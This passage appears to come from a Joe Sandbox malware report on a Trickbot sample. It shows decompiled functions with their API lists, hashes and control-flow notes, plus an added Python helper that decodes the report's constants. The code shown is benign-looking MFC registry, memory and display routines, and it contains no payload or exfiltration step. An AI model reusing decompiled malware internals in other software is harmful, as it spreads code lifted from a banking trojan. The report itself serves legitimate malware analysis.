                          					}
                          				} else {
                          					_t5 = _t71 + 0x10; // 0x1cbf10
                          					if(( *( *_t5 + _t70 * 8) & 0x00000001) != 0) {
                          						goto L2;
                          					}
                          				}
                          				_t23 = _t71 + 0xc; // 0x4
                          				if(_t70 >=  *_t23) {
                          					_t24 = _t70 + 1; // 0x5
                          					 *((intOrPtr*)(_t71 + 0xc)) = _t24;
                          				}
                          				_t26 = _t71 + 0x10; // 0x1cbf10
                          				 *( *_t26 + _t70 * 8) =  *( *_t26 + _t70 * 8) | 0x00000001;
                          				_t34 = _t70 + 1; // 0x5
                          				 *(_t71 + 8) = _t34;
                          				LeaveCriticalSection( *(_t74 + 0x10));
                          				return _t70;
                          			}

                          Instruction address column (shown beside each code line in the original report; the per-line alignment was lost in extraction, the addresses listed run from 0x004329eb to 0x00432af8)

                          APIs
                          • EnterCriticalSection.KERNEL32(0044B4BC,0044B2EC,00000000,?,0044B4A0,0044B4A0,00432D82,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C,?,00000000), ref: 004329F6
                          • GlobalAlloc.KERNELBASE(00002002,00000000,?,?,0044B4A0,0044B4A0,00432D82,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C,?,00000000), ref: 00432A4B
                          • GlobalHandle.KERNEL32(001CBF10), ref: 00432A54
                          • GlobalUnlock.KERNEL32(00000000,?,?,0044B4A0,0044B4A0,00432D82,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C,?,00000000), ref: 00432A5D
                          • GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 00432A6F
                          • GlobalHandle.KERNEL32(001CBF10), ref: 00432A86
                          • GlobalLock.KERNEL32(00000000,?,?,0044B4A0,0044B4A0,00432D82,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C,?,00000000), ref: 00432A8D
                          • LeaveCriticalSection.KERNEL32(00405287,?,?,0044B4A0,0044B4A0,00432D82,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C,?,00000000), ref: 00432A93
                          • GlobalLock.KERNEL32(00000000,?,?,0044B4A0,0044B4A0,00432D82,?,00000000,00432571,00430506,0043258D,0041C011,0041E91C,?,00000000), ref: 00432AA2
                          • LeaveCriticalSection.KERNEL32(?), ref: 00432AEB
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Global$CriticalSection$AllocHandleLeaveLock$EnterUnlock
                          • String ID:
                          • API String ID: 2667261700-0
                          • Opcode ID: 2f7465d992080110dd1e2c3ff5dbbd224f692032a86fb3c78edd8e679525e611
                          • Instruction ID: 98b49dcb7c7969d299e935ac0ecca1364499eaedbc17bfe6428f456728b09796
                          • Opcode Fuzzy Hash: 2f7465d992080110dd1e2c3ff5dbbd224f692032a86fb3c78edd8e679525e611
                          • Instruction Fuzzy Hash: 0D316071600705AFDB24DF28DD89A2BB7E9FB48305F00592EE956C3661D7B5EC048B14
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          Basic blocks, flattened from the rendered graph (block id: address range, API calls made in the block; successor blocks). The executed/not-executed colouring of the graph is not recoverable in text.
                          • 183: 0x431f87-0x431fbd, RegOpenKeyExA; successors 184, 185
                          • 184: 0x431ff9-0x432002; successors 187, 188
                          • 185: 0x431fbf-0x431fdc, RegCreateKeyExA; successors 184, 186
                          • 186: 0x431fde-0x431ff7, RegCreateKeyExA; successor 184
                          • 187: 0x432004-0x432007, RegCloseKey; successor 188
                          • 188: 0x432009-0x43200c; successors 189, 190
                          • 189: 0x432013-0x43201a; no successors (function exit)
                          • 190: 0x43200e-0x432011, RegCloseKey; successor 189
                          C-Code - Quality: 100%
                          			E00431F87(intOrPtr __ecx) {
                          				void* _v8;
                          				void* _v12;
                          				void* _v16;
                          				int _v20;
                          				intOrPtr _v24;
                          				long _t21;
                          				long _t27;
                          				intOrPtr _t32;
                          
                          				_t32 = __ecx;
                          				_v24 = __ecx;
                          				_v16 = 0;
                          				_v8 = 0;
                          				_v12 = 0;
                          				_t21 = RegOpenKeyExA(0x80000001, "software", 0, 0x2001f,  &_v8); // executed
                          				if(_t21 == 0) {
                          					_t27 = RegCreateKeyExA(_v8,  *(_t32 + 0x7c), 0, 0, 0, 0x2001f, 0,  &_v12,  &_v20); // executed
                          					if(_t27 == 0) {
                          						RegCreateKeyExA(_v12,  *(_v24 + 0x90), 0, 0, 0, 0x2001f, 0,  &_v16,  &_v20); // executed
                          					}
                          				}
                          				if(_v8 != 0) {
                          					RegCloseKey(_v8); // executed
                          				}
                          				if(_v12 != 0) {
                          					RegCloseKey(_v12); // executed
                          				}
                          				return _v16;
                          			}

                          Instruction address column (shown beside each code line in the original report; the per-line alignment was lost in extraction, the addresses listed run from 0x00431f9d to 0x0043201a)

                          APIs
                          • RegOpenKeyExA.KERNEL32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 00431FB5
                          • RegCreateKeyExA.KERNEL32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00431FD8
                          • RegCreateKeyExA.KERNEL32(?,?,00000000,00000000,00000000,0002001F,00000000,00000000,00000000), ref: 00431FF7
                          • RegCloseKey.KERNEL32(?), ref: 00432007
                          • RegCloseKey.KERNEL32(?), ref: 00432011
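The "APIs" lines in these records print every operand as raw hex, so a reader has to know that 80000001 is HKEY_CURRENT_USER and 0002001F is KEY_READ|KEY_WRITE before the registry function above reads naturally: E00431F87 opens HKCU\software and creates a two-level application key beneath it from two fields of its object, the shape of MFC's CWinApp::GetSectionKey (an identification made here, not by the report; the AfxOldWndProc423 property used by E0041892F earlier on the page is likewise the name MFC uses when it subclasses a window). E0041892F's message switch is rendered by the decompiler as a chain of subtractions (6, then 0x1a, 0x62, 0x8e), which hides the message numbers it actually compares against. The Python below is an editorial example added here; it is not part of the Joe Sandbox report or of the analysed sample. It parses API lines of this format into records, decodes the constants in the operand slots it knows about, and recovers the message numbers from the subtraction chain. The sample lines are copied from this page; the decoder tables cover only the constants that occur on it, and every function and field name is the example's own.

```python
import re
from dataclasses import dataclass
from typing import List, Optional
# Constructed input: "APIs" lines copied from the function records on this page.
SAMPLE_API_LINES = """\
• RegOpenKeyExA.KERNEL32(80000001,software,00000000,0002001F,?,00000000,00000000), ref: 00431FB5
• RegCreateKeyExA.KERNEL32(?,?,00000000,00000000,00000000,0002001F,00000000,?,00000000), ref: 00431FD8
• RegCloseKey.KERNEL32(?), ref: 00432007
• GlobalAlloc.KERNELBASE(00002002,00000000,?,?,0044B4A0), ref: 00432A4B
• GlobalReAlloc.KERNEL32(00000000,00000000,00002002), ref: 00432A6F
• SetWindowLongA.USER32(?,000000FC,?), ref: 004189DA
• CallWindowProcA.USER32(?,?,00000110,?,00000000), ref: 004189AA
  • Part of subcall function 0041853C: GetWindowRect.USER32(?,?), ref: 00418561
"""

# One line: optional "Part of subcall function XXXX:", then Api.MODULE(args), ref: addr
LINE_RE = re.compile(r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
                     r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")

@dataclass
class ApiCall:
    api: str
    module: str
    args: list                        # int for hex operands, None for '?', str for strings
    ref: int                          # call-site address
    subcall_of: Optional[int] = None  # set for "Part of subcall function" lines

def parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None
    # Joe prints numeric operands as exactly 8 hex digits; anything else is a string operand
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok

def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for m in filter(None, map(LINE_RE.match, text.splitlines())):
        args = [parse_arg(t) for t in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["api"], m["module"], args, int(m["ref"], 16),
                             int(m["sub"], 16) if m["sub"] else None))
    return calls

# Decoder tables for the constants that occur on this page (values from the Windows SDK).
HKEY_ROOTS = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
              0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}
# KEY_READ = 0x20019, KEY_WRITE = 0x20006, KEY_ALL_ACCESS = 0xF003F; 0x2001F is KEY_READ|KEY_WRITE.
REG_SAM_BITS = {0x1: "KEY_QUERY_VALUE", 0x2: "KEY_SET_VALUE", 0x4: "KEY_CREATE_SUB_KEY",
                0x8: "KEY_ENUMERATE_SUB_KEYS", 0x10: "KEY_NOTIFY", 0x20: "KEY_CREATE_LINK",
                0x10000: "DELETE", 0x20000: "READ_CONTROL", 0x40000: "WRITE_DAC", 0x80000: "WRITE_OWNER"}
GMEM_BITS = {0x2: "GMEM_MOVEABLE", 0x40: "GMEM_ZEROINIT", 0x2000: "GMEM_SHARE"}
WM_NAMES = {0x6: "WM_ACTIVATE", 0x20: "WM_SETCURSOR", 0x82: "WM_NCDESTROY", 0x110: "WM_INITDIALOG"}

def decode_bits(value: int, table: dict) -> List[str]:
    """Names of the flag bits set in value; leftover bits not in the table are kept as hex."""
    names = [name for bit, name in table.items() if value & bit]
    leftover = value & ~sum(table)
    return names + ([hex(leftover)] if leftover else [])

def decode_gwl(value: int) -> str:
    # The report prints the index as 000000FC; the decompiled call passes 0xfffffffc. Both are -4.
    return "GWL_WNDPROC" if value in (0xFC, 0xFFFFFFFC) else hex(value)
hkey = lambda v: HKEY_ROOTS.get(v, hex(v))
sam = lambda v: "|".join(decode_bits(v, REG_SAM_BITS))
gmem = lambda v: "|".join(decode_bits(v, GMEM_BITS))
# (API name, operand position) -> decoder for that operand
ARG_DECODERS = {("RegOpenKeyExA", 0): hkey, ("RegOpenKeyExA", 3): sam,
                ("RegCreateKeyExA", 0): hkey, ("RegCreateKeyExA", 5): sam,
                ("GlobalAlloc", 0): gmem, ("GlobalReAlloc", 2): gmem,
                ("SetWindowLongA", 1): decode_gwl,
                ("CallWindowProcA", 2): lambda v: WM_NAMES.get(v, hex(v))}

def annotate(call: ApiCall) -> List[str]:
    """Render each operand: decoded name where the slot is known, '?' where the report has none."""
    out = []
    for i, a in enumerate(call.args):
        dec = ARG_DECODERS.get((call.api, i))
        if a is None:
            out.append("?")
        elif isinstance(a, int):
            out.append(dec(a) if dec else f"0x{a:08x}")
        else:
            out.append(repr(a))
    return out

def summarize(text: str) -> List[str]:
    """One readable line per call: call-site address, API, decoded operands."""
    return [f"{c.ref:08X} {c.api}({', '.join(annotate(c))})" for c in parse_api_lines(text)]

def resolve_switch_chain(deltas: List[int]) -> List[int]:
    """The decompiler renders a message switch as successive subtractions (_t35 = msg - 6;
    _t41 = _t35 - 0x1a; ...). Running sums of the deltas are the message numbers compared."""
    out, acc = [], 0
    for d in deltas:
        acc += d
        out.append(acc)
    return out

if __name__ == "__main__":
    print("\n".join(summarize(SAMPLE_API_LINES)))
    print([WM_NAMES[m] for m in resolve_switch_chain([6, 0x1a, 0x62, 0x8e])])
```

Run stand-alone it prints one decoded line per call. Two of the decodings are worth having in front of you while reading the records above: the access mask 0x2001F carries the KEY_* query, set, create, enumerate and notify rights plus READ_CONTROL, and none of DELETE, WRITE_DAC or WRITE_OWNER, so E00431F87 asks for KEY_READ|KEY_WRITE rather than KEY_ALL_ACCESS; and the GlobalAlloc flags 0x2002 are GMEM_MOVEABLE|GMEM_SHARE, which is why E004329E7 has to GlobalLock the handle before it touches the slot array. The subtraction chain of E0041892F resolves to WM_ACTIVATE, WM_SETCURSOR, WM_NCDESTROY and WM_INITDIALOG, matching the message 0x110 the report shows in its CallWindowProcA line.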
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: CloseCreate$Open
                          • String ID: software
                          • API String ID: 1740278721-2010147023
                          • Opcode ID: 939ff842e9c6595b817828ae10e83e6ce885d2835caf59c2e690572aef84774d
                          • Instruction ID: 22bfda63fbbbe92fa5461a2b50590be62385f2120e4bb363b446014f6f283299
                          • Opcode Fuzzy Hash: 939ff842e9c6595b817828ae10e83e6ce885d2835caf59c2e690572aef84774d
                          • Instruction Fuzzy Hash: 5B11D476900118BACB21DB96DD84DEFFFBCEF89700F1040AAA504A2121D2B09E44DB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          Basic blocks, flattened from the rendered graph (block id: address range, API calls made in the block; successor blocks). The executed/not-executed colouring of the graph is not recoverable in text.
                          • 191: 0x41cbb0-0x41cbcd, GetSystemMetrics (2 calls); successors 192, 193
                          • 192: 0x41cbd6, call 0x432790; successor 197
                          • 193: 0x41cbcf-0x41cbd4, call 0x432760; successor 197
                          • 197: 0x41cbdb-0x41cc07, GetDC, GetDeviceCaps (2 calls), ReleaseDC; no successors (function exit)
                          C-Code - Quality: 100%
                          			E0041CBB0(void* __ecx) {
                          				int _t6;
                          				struct HDC__* _t17;
                          				void* _t18;
                          
                          				_t18 = __ecx;
                          				_t6 = GetSystemMetrics(0xb); // executed
                          				 *(_t18 + 8) = _t6;
                          				 *((intOrPtr*)(_t18 + 0xc)) = GetSystemMetrics(0xc);
                          				if( *((intOrPtr*)(_t18 + 0x68)) == 0) {
                          					E00432790();
                          				} else {
                          					E00432760();
                          				}
                          				_t17 = GetDC(0);
                          				 *((intOrPtr*)(_t18 + 0x18)) = GetDeviceCaps(_t17, 0x58);
                          				 *((intOrPtr*)(_t18 + 0x1c)) = GetDeviceCaps(_t17, 0x5a);
                          				return ReleaseDC(0, _t17);
                          			}

                          Instruction address column (shown beside each code line in the original report; the per-line alignment was lost in extraction, the addresses listed run from 0x0041cbb9 to 0x0041cc07)

                          APIs
                          • GetSystemMetrics.USER32(0000000B), ref: 0041CBBD
                          • GetSystemMetrics.USER32(0000000C), ref: 0041CBC4
                          • GetDC.USER32(00000000), ref: 0041CBDD
                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 0041CBEE
                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041CBF6
                          • ReleaseDC.USER32(00000000,00000000), ref: 0041CBFE
                            • Part of subcall function 00432760: GetSystemMetrics.USER32(00000002), ref: 00432772
                            • Part of subcall function 00432760: GetSystemMetrics.USER32(00000003), ref: 0043277C
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: MetricsSystem$CapsDevice$Release
                          • String ID:
                          • API String ID: 1151147025-0
                          • Opcode ID: 728d5a1868a233504d2a31b1683231eee4185b1accb182d5150eb7b0aef3dae5
                          • Instruction ID: 08fc2840edf26341d66665d218ae6a8697be2df0d04b0a9dfdbe7d33530523c6
                          • Opcode Fuzzy Hash: 728d5a1868a233504d2a31b1683231eee4185b1accb182d5150eb7b0aef3dae5
                          • Instruction Fuzzy Hash: 86F0B470580700AAE7206BB29C8AF6777A4FB80756F00442EE20197290CBF8AC05CFA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          Basic blocks, flattened from the rendered graph (block id: address range, calls made in the block; successor blocks). The executed/not-executed colouring of the graph is not recoverable in text.
                          • 198: 0x431642-0x431654, call 0x405340; successors 201, 202
                          • 201: 0x431696-0x4316bb, call 0x432061; no successors (function exit)
                          • 202: 0x431656-0x431669, call 0x41bdeb; successors 207, 208
                          • 207: 0x431683; successor 210
                          • 208: 0x43166b-0x431681, call 0x41e286; successor 210
                          • 210: 0x431685-0x431693, call 0x41e873; successor 201
                          C-Code - Quality: 65%
                          			E00431642(void* __ecx) {
                          				intOrPtr _t14;
                          				intOrPtr* _t16;
                          				intOrPtr _t22;
                          				void* _t26;
                          				void* _t28;
                          
                          				E00405340(E004381EA, _t28);
                          				_push(__ecx);
                          				_t26 = __ecx;
                          				if( *((intOrPtr*)(_t28 + 8)) != 0) {
                          					_t22 = E0041BDEB(0x20);
                          					 *((intOrPtr*)(_t28 - 0x10)) = _t22;
                          					 *(_t28 - 4) =  *(_t28 - 4) & 0x00000000;
                          					if(_t22 == 0) {
                          						_t16 = 0;
                          					} else {
                          						_push(0x1e);
                          						_push( *((intOrPtr*)(_t28 + 8)));
                          						_push("File%d");
                          						_push("Recent File List");
                          						_push(0);
                          						_t16 = E0041E286(_t22);
                          					}
                          					 *(_t28 - 4) =  *(_t28 - 4) | 0xffffffff;
                          					 *((intOrPtr*)(_t26 + 0xa8)) = _t16;
                          					 *((intOrPtr*)( *_t16 + 0xc))();
                          				}
                          				_t14 = E00432061(_t26, "Settings", "PreviewPages", 0); // executed
                          				 *((intOrPtr*)(_t26 + 0xb4)) = _t14;
                          				 *[fs:0x0] =  *((intOrPtr*)(_t28 - 0xc));
                          				return _t14;
                          			}

                          Instruction address column (shown beside each code line in the original report; the per-line alignment was lost in extraction, the addresses listed run from 0x00431647 to 0x004316bb)

                          APIs
                          • __EH_prolog.LIBCMT ref: 00431647
                            • Part of subcall function 0041E286: __EH_prolog.LIBCMT ref: 0041E28B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: H_prolog
                          • String ID: File%d$PreviewPages$Recent File List$Settings
                          • API String ID: 3519838083-526586445
                          • Opcode ID: 6f3b7b15778d497f2daf6d44c491ab8a82701b9e33e79a2c74c78f34a279aae3
                          • Instruction ID: c105981f393b24eba65fe84dcabe9daa351ab0f1483bca60c1a014263f27ad1c
                          • Opcode Fuzzy Hash: 6f3b7b15778d497f2daf6d44c491ab8a82701b9e33e79a2c74c78f34a279aae3
                          • Instruction Fuzzy Hash: 7501A931B41704BBDB689FB4D802B9EB6B1EB0CB19F20512FB515A62C1C7BC5541875C
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 86%
                          			E004320CD(void* __ebx, void* __ecx, void* __esi, void* __eflags) {
                          				void* _t46;
                          				long _t47;
                          				CHAR* _t59;
                          				void* _t61;
                          				CHAR* _t64;
                          				void* _t78;
                          
                          				_t61 = __ecx;
                          				E00405340(E00438308, _t78);
                          				E00405B80(0x100c, __ecx);
                          				 *(_t78 - 0x14) = 0;
                          				if( *((intOrPtr*)(_t61 + 0x7c)) == 0) {
                          					__eflags =  *(_t78 + 0x14);
                          					if( *(_t78 + 0x14) == 0) {
                          						 *(_t78 + 0x14) = 0x449788;
                          					}
                          					GetPrivateProfileStringA( *(_t78 + 0xc),  *(_t78 + 0x10),  *(_t78 + 0x14), _t78 - 0x1018, 0x1000,  *(_t61 + 0x90));
                          					_push(_t78 - 0x1018);
                          					goto L12;
                          				} else {
                          					_t46 = E0043201B(_t61,  *(_t78 + 0xc)); // executed
                          					 *(_t78 - 0x10) = _t46;
                          					if(_t46 != 0) {
                          						_t64 =  *0x447478; // 0x44748c
                          						 *(_t78 + 0xc) = _t64;
                          						 *(_t78 - 4) = 0;
                          						_t47 = RegQueryValueExA(_t46,  *(_t78 + 0x10), 0, _t78 - 0x14, 0, _t78 - 0x18); // executed
                          						_t59 = _t47;
                          						__eflags = _t59;
                          						if(_t59 == 0) {
                          							_t59 = RegQueryValueExA( *(_t78 - 0x10),  *(_t78 + 0x10), 0, _t78 - 0x14, E004181F7(_t78 + 0xc, _t78,  *(_t78 - 0x18)), _t78 - 0x18);
                          							E00418246(_t78 + 0xc, __eflags, 0xffffffff);
                          						}
                          						RegCloseKey( *(_t78 - 0x10)); // executed
                          						__eflags = _t59;
                          						if(_t59 != 0) {
                          							E00417F36( *((intOrPtr*)(_t78 + 8)), _t78,  *(_t78 + 0x14));
                          						} else {
                          							E00417C3D( *((intOrPtr*)(_t78 + 8)), _t78 + 0xc);
                          						}
                          						 *(_t78 - 4) =  *(_t78 - 4) | 0xffffffff;
                          						E00417EC8(_t78 + 0xc);
                          					} else {
                          						_push( *(_t78 + 0x14));
                          						L12:
                          						E00417F36( *((intOrPtr*)(_t78 + 8)), _t78);
                          					}
                          				}
                          				 *[fs:0x0] =  *((intOrPtr*)(_t78 - 0xc));
                          				return  *((intOrPtr*)(_t78 + 8));
                          			}

                          APIs
                          • __EH_prolog.LIBCMT ref: 004320D2
                          • RegQueryValueExA.KERNEL32(00000000,?,00000000,?,00000000,?,?,00000001,?,00000000,0041E8D6,?,?,?,00449788), ref: 00432129
                          • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,?,00000001,?,00000000,0041E8D6,?,?,?,00449788), ref: 0043214C
                          • RegCloseKey.KERNEL32(?,?,00000001,?,00000000,0041E8D6,?,?,?,00449788), ref: 0043215D
                          • GetPrivateProfileStringA.KERNEL32(?,?,?,?,00001000,?), ref: 004321B7
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: QueryValue$CloseH_prologPrivateProfileString
                          • String ID:
                          • API String ID: 1022837590-0
                          • Opcode ID: 261c40d04a992bcf139e5b40edf533778dbb3864d506c50773edb15034eb117e
                          • Instruction ID: 4479ac512a49c133f8d7ecca0d800d9f8e6ddc368908ae10fc8aa11e92d8ef72
                          • Opcode Fuzzy Hash: 261c40d04a992bcf139e5b40edf533778dbb3864d506c50773edb15034eb117e
                          • Instruction Fuzzy Hash: 1D31583190010AEBCF15DF91CE40CEEBB79EB48354F10812BFA25A61A0D7B59A56DB64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 100%
                          			E00408838() {
                          				signed int _t15;
                          				void* _t17;
                          				void* _t19;
                          				void* _t25;
                          				signed int _t26;
                          				void* _t27;
                          				intOrPtr* _t29;
                          
                          				_t15 =  *0x44d0b4; // 0x1
                          				_t26 =  *0x44d0a4; // 0x10
                          				if(_t15 != _t26) {
                          					L3:
                          					_t27 =  *0x44d0b8; // 0x13507d0
                          					_t29 = _t27 + (_t15 + _t15 * 4) * 4;
                          					_t17 = RtlAllocateHeap( *0x44d0bc, 8, 0x41c4); // executed
                          					 *(_t29 + 0x10) = _t17;
                          					if(_t17 == 0) {
                          						L6:
                          						return 0;
                          					}
                          					_t19 = VirtualAlloc(0, 0x100000, 0x2000, 4); // executed
                          					 *(_t29 + 0xc) = _t19;
                          					if(_t19 != 0) {
                          						 *(_t29 + 8) =  *(_t29 + 8) | 0xffffffff;
                          						 *_t29 = 0;
                          						 *((intOrPtr*)(_t29 + 4)) = 0;
                          						 *0x44d0b4 =  *0x44d0b4 + 1;
                          						 *( *(_t29 + 0x10)) =  *( *(_t29 + 0x10)) | 0xffffffff;
                          						return _t29;
                          					}
                          					HeapFree( *0x44d0bc, 0,  *(_t29 + 0x10));
                          					goto L6;
                          				}
                          				_t2 = _t26 * 4; // 0x60
                          				_t25 = HeapReAlloc( *0x44d0bc, 0,  *0x44d0b8, _t26 + _t2 + 0x50 << 2);
                          				if(_t25 == 0) {
                          					goto L6;
                          				}
                          				 *0x44d0a4 =  *0x44d0a4 + 0x10;
                          				 *0x44d0b8 = _t25;
                          				_t15 =  *0x44d0b4; // 0x1
                          				goto L3;
                          			}

                          APIs
                          • HeapReAlloc.KERNEL32(00000000,00000060,?,00000000,00408600,?,j/@,00000000,000000E0,0040512A,00402F6A,00402F6A), ref: 00408860
                          • RtlAllocateHeap.NTDLL(00000008,000041C4,?,00000000,00408600,?,j/@,00000000,000000E0,0040512A,00402F6A,00402F6A), ref: 00408894
                          • VirtualAlloc.KERNELBASE(00000000,00100000,00002000,00000004,?,00000000,00408600,?,j/@,00000000,000000E0,0040512A,00402F6A,00402F6A), ref: 004088AE
                          • HeapFree.KERNEL32(00000000,?), ref: 004088C5
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: Heap$Alloc$AllocateFreeVirtual
                          • String ID:
                          • API String ID: 1005975451-0
                          • Opcode ID: 7785a32c3870f01c1921b0e29ee540b386b862605303c0bce40db1a70a1ecdaa
                          • Instruction ID: 39bf4ac56edb5d8f9557d9b7b1b9dd991b5dd42185a64f63e89d9d0ee6540605
                          • Opcode Fuzzy Hash: 7785a32c3870f01c1921b0e29ee540b386b862605303c0bce40db1a70a1ecdaa
                          • Instruction Fuzzy Hash: DE118C35A04601AFD7309F58ED459227BB6FF96328B504A3EF2A1E72B0C7709806CB19
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 84%
                          			E00432061(void* __ecx, int _a4, CHAR* _a8, int _a12) {
                          				char _v8;
                          				int _v12;
                          				int _t14;
                          				void* _t15;
                          				long _t19;
                          				void* _t27;
                          
                          				_push(__ecx);
                          				_push(__ecx);
                          				if( *((intOrPtr*)(__ecx + 0x7c)) == 0) {
                          					_t14 = GetPrivateProfileIntA(_a4, _a8, _a12,  *(__ecx + 0x90));
                          				} else {
                          					_t15 = E0043201B(__ecx, _a4); // executed
                          					_t27 = _t15;
                          					if(_t27 != 0) {
                          						_a4 = 4;
                          						_t19 = RegQueryValueExA(_t27, _a8, 0,  &_v12,  &_v8,  &_a4); // executed
                          						RegCloseKey(_t27); // executed
                          						if(_t19 != 0) {
                          							goto L2;
                          						} else {
                          							_t14 = _v8;
                          						}
                          					} else {
                          						L2:
                          						_t14 = _a12;
                          					}
                          				}
                          				return _t14;
                          			}

                          APIs
                          • RegQueryValueExA.KERNEL32(00000000,?,00000000,?,?,?,?,?), ref: 0043209A
                          • RegCloseKey.KERNEL32(00000000,?,?), ref: 004320A3
                          • GetPrivateProfileIntA.KERNEL32(?,?,?,?), ref: 004320C2
                          Memory Dump Source
                          • Source File: 00000000.00000002.253939010.00401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.253932686.00400000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.253994298.00439000.00000002.00020000.sdmp
                          • Associated: 00000000.00000002.254008311.00447000.00000004.00020000.sdmp
                          • Associated: 00000000.00000002.254017408.0044E000.00000002.00020000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_400000_2019-10-21-Trickbot-gtag-mor27-retreived-by-Emotet-infected-host.jbxd
                          Similarity
                          • API ID: ClosePrivateProfileQueryValue
                          • String ID:
                          • API String ID: 1423431592-0
                          • Opcode ID: e7873a9df224d5c80b0f3b4ee5b9dcdea25e4687cee60bc4680a39649fb3ee8e
                          • Instruction ID: 543d6433257c1d13a780289a4184b1cb8692c2bcc61bb3a19cd6e8033d217069
                          • Opcode Fuzzy Hash: e7873a9df224d5c80b0f3b4ee5b9dcdea25e4687cee60bc4680a39649fb3ee8e
                          • Instruction Fuzzy Hash: 5E014B76001118FBCF268F50DD44FDF3B79EB48354F10502AFA159A250D7B5DA1ADBA8
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          C-Code - Quality: 83%
                          			E00403750(void* __ecx, void* __ebp, void* __eflags) {
                          				void* _v8;
